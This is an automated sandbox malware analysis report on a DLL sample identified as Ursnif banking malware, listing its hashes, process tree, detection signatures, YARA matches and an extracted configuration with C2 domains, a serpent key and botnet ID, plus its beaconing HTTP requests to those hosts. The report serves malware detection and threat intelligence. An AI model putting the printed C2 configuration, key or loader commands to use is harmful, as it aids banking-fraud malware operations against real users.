Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 9091.dll

Overview

General Information

Sample Name:9091.dll
Analysis ID:548724
MD5:8cef4bb6ea32fc461e3a954500413512
SHA1:d0612a06f724ebdb72db009010207c929aac9007
SHA256:6a455667f74c818d5e20a83af8ba5eb8022b1714ceb9302c2b7f7f4ea1a141c9
Tags:dllexeZloader
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Registers a DLL
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4908 cmdline: loaddll32.exe "C:\Users\user\Desktop\9091.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1364 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5032 cmdline: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 2332 cmdline: regsvr32.exe /s C:\Users\user\Desktop\9091.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6008 cmdline: rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "aScpE7CilQ9VtygBXbwXm3cD296yz+RssVO+4h8dSJN8SwshLOZQ8SH7VEx70uuWiFjdqr+uklWJF/baQZUtCK4Bm7884qZ6qhDkBdiQK8V2zH0dHiFpHhB//0WN950qgmnuJAQbYHO78/vC+UGIVbVNILi+zFGHaDdiP/Ka/IdBmgobFFhN6+VD656EnLLJ", "c2_domain": ["google.mail.com", "firsone1.online", "kdsjdsadas.online"], "botnet": "9091", "server": "12", "serpent_key": "01026655AALLKENM", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 47 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.loaddll32.exe.990000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              5.2.rundll32.exe.10000000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                4.2.rundll32.exe.4400000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  4.2.rundll32.exe.10000000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    5.2.rundll32.exe.ba0000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1364, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, ProcessId: 5032

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "aScpE7CilQ9VtygBXbwXm3cD296yz+RssVO+4h8dSJN8SwshLOZQ8SH7VEx70uuWiFjdqr+uklWJF/baQZUtCK4Bm7884qZ6qhDkBdiQK8V2zH0dHiFpHhB//0WN950qgmnuJAQbYHO78/vC+UGIVbVNILi+zFGHaDdiP/Ka/IdBmgobFFhN6+VD656EnLLJ", "c2_domain": ["google.mail.com", "firsone1.online", "kdsjdsadas.online"], "botnet": "9091", "server": "12", "serpent_key": "01026655AALLKENM", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 9091.dllVirustotal: Detection: 22%Perma Link
                      Source: 9091.dllReversingLabs: Detection: 30%
                      Machine Learning detection for sampleShow sources
                      Source: 9091.dllJoe Sandbox ML: detected
                      Source: 3.2.regsvr32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 5.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 4.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 0.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 9091.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49803 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49812 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49813 version: TLS 1.2

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 134.0.117.195 187Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: google.mail.com
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: firsone1.online
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: kdsjdsadas.online
                      Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jan 2022 10:52:39 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 460Connection: closeContent-Type: text/html; charset=iso-8859-1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jan 2022 10:52:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 437Connection: closeContent-Type: text/html; charset=iso-8859-1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jan 2022 10:52:42 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 449Connection: closeContent-Type: text/html; charset=iso-8859-1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jan 2022 10:52:46 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 424Connection: closeContent-Type: text/html; charset=iso-8859-1
                      Source: loaddll32.exe, 00000000.00000003.484041107.0000000000AC5000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 9091.dllString found in binary or memory: http://www.symantec.com
                      Source: loaddll32.exe, 00000000.00000003.484055973.0000000000ADA000.00000004.00000001.sdmpString found in binary or memory: https://firsone1.online/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu5
                      Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpString found in binary or memory: https://google.mail.com/jkloll/SrOhqn0MT2IAkG_2B4u/QUT97q1sQV0r5x6X8tk4tl/QK7oXiqO2sMkr/Uet1eMX4/DBd
                      Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpString found in binary or memory: https://kdsjdsadas.online/
                      Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpString found in binary or memory: https://kdsjdsadas.online/jkloll/n1yCX1bWO/IyJVfm7yH8jH38Bki7vn/f4C45hYEgppc8I7zVra/TaacUzdsuPU7_2Bk
                      Source: unknownDNS traffic detected: queries for: google.mail.com
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,0_2_00D45988
                      Source: global trafficHTTP traffic detected: GET /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49803 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49812 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49813 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
